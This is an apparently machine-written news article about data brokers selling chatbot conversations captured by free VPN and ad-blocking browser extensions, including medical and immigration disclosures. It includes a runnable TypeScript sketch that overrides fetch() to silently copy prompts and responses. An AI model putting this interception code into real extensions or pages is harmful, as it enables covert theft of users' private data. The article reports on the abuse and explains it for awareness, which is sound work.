Today's cybersecurity headlines are brought to you by ThreatPerspective


Ethical Hacking News

Data Brokers are Selling Access to Sensitive Personal Data Captured During Chatbot Conversations



Data brokers are selling access to sensitive personal data captured during chatbot conversations, raising concerns about user privacy and security. A recent report highlights the potential risks of using free VPNs and other browser extensions that may be harvesting personal data, and calls for greater awareness and education among users. The industry's need for regulation and transparency has never been more pressing.

  • Data brokers are selling access to sensitive personal data captured during chatbot conversations.
  • Free VPNs and browser extensions can intercept users' communications with AI services, capturing sensitive information.
  • Conversations involving sensitive topics like medical records, immigration status, and personal details can be accessed by customers of data brokers.
  • The use of free VPNs and third-party services to access chatbots raises concerns about user privacy and security.



  • The recent revelation that data brokers are selling access to sensitive personal data captured during chatbot conversations has sent shockwaves through the tech community, highlighting the need for greater transparency and regulation in the industry. According to a report by Lee S Dryburgh, an expert in AI visibility for consumer health and longevity brands, these data brokers have been capturing user interactions with popular AI chatbots like ChatGPT, Gemini, Claude, and DeepSeek, and selling them to authenticated customers.

    The data harvesting is typically carried out through browser extensions that claim to offer a free VPN service or ad-blocking capabilities. In reality, these extensions silently intercept users' communications with AI services, overriding the browser's native fetch() function and XMLHttpRequest object to capture every prompt and response. This allows the data brokers to collect sensitive information such as names, dates of birth, medical record numbers, diagnosis codes, and even clinical notes covered by HIPAA.
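    The interception technique described above can be sketched in a few lines. The following is a minimal, illustrative TypeScript reconstruction of how an extension might monkey-patch the page's fetch() function; every identifier here (capturedLog, installFetchInterceptor) is an assumption for illustration, not code from the report or any real extension:

```typescript
// Sketch of the fetch() interception the report describes: a malicious
// extension replaces the page's native fetch with a wrapper that copies
// every prompt and response before letting traffic through unchanged.
// All identifiers below are illustrative assumptions, not real-world code.

type LogEntry = { url: string; requestBody: string; responseBody: string };
const capturedLog: LogEntry[] = [];

function installFetchInterceptor(): void {
  const nativeFetch = globalThis.fetch; // keep the real fetch so traffic still flows
  globalThis.fetch = (async (input: any, init?: any) => {
    const url = typeof input === "string" ? input : String(input);
    const requestBody = typeof init?.body === "string" ? init.body : "";
    const response = await nativeFetch(input, init);
    // clone() lets the wrapper read the body without consuming the
    // stream that the page itself is about to read
    const responseBody = await response.clone().text();
    capturedLog.push({ url, requestBody, responseBody });
    return response; // the page sees a completely normal response
  }) as typeof fetch;
}

async function main(): Promise<void> {
  // Stand-in for the real network layer so this sketch runs anywhere (Node 18+),
  // instead of sending actual traffic to a chatbot service:
  globalThis.fetch = (async () => new Response('{"reply":"ok"}')) as typeof fetch;

  installFetchInterceptor();

  // The page sends a chatbot prompt as usual...
  await fetch("https://chat.example/api", {
    method: "POST",
    body: '{"prompt":"patient MRN 12345, lab results attached"}',
  });

  // ...and the wrapper has silently kept a verbatim, searchable copy.
  console.log(capturedLog[0].requestBody);
}

main();
```

    Because the wrapper returns the original Response object untouched, the page behaves identically with or without the interceptor installed, which is what makes this style of harvesting invisible to users.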

    The report details how customers of these data brokers can search for and find conversations about suicide, medical records that may enable identification, HIV lab results, abortion clinic searches, immigration status disclosures, domestic violence narratives, and children's conversations. This poses serious legal risks in the current political climate, particularly for undocumented immigrants and asylum seekers who have asked chatbots about their legal status.

    The study also reveals that a significant portion of these conversations involve people pasting internal corporate information into chatbots for rewrites and summaries. Furthermore, remote workers doing work for Western clients may rely on third-party services that sell groups of people shared access to a single chatbot account, because they cannot afford individual subscriptions.

    The use of free VPN extensions as a harvesting vector is particularly concerning, as it highlights how easily sensitive information can be captured and sold. The report cites examples of conversations that reveal real names, dates of birth, medical record numbers, and diagnosis codes, all verbatim and searchable in a commercial database.

    The fact that healthcare workers are pasting real patient data into AI chatbots, only for it to end up in a commercial database, is particularly alarming. This underscores the need for greater regulation and oversight in the industry, as well as greater transparency from companies about their data-handling practices.

    In response to these concerns, Lee S Dryburgh has called for greater awareness and education among users about the potential risks of using free VPNs and other browser extensions that may be harvesting their personal data. He also emphasizes the need for companies to prioritize user privacy and security, particularly in the context of AI-powered chatbots.

    Ultimately, the revelation that data brokers are selling access to sensitive personal data captured during chatbot conversations raises important questions about the ethics of collecting and using user data. As we move forward with the increasing adoption of AI technology, it is essential that we prioritize user privacy and security, as well as transparency and regulation in the industry.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/Data-Brokers-are-Selling-Access-to-Sensitive-Personal-Data-Captured-During-Chatbot-Conversations-ehn.shtml

  • https://www.theregister.com/2026/03/03/chatbot_data_harvesting_personal_info/

  • https://innovirtuoso.com/cybersecurity/the-underground-world-of-data-brokers-how-your-personal-info-gets-sold-and-how-to-fight-back/


  • Published: Tue Mar 3 15:41:28 2026 by llama3.2 3B Q4_K_M

    © Ethical Hacking News. All rights reserved.

    Privacy | Terms of Use | Contact Us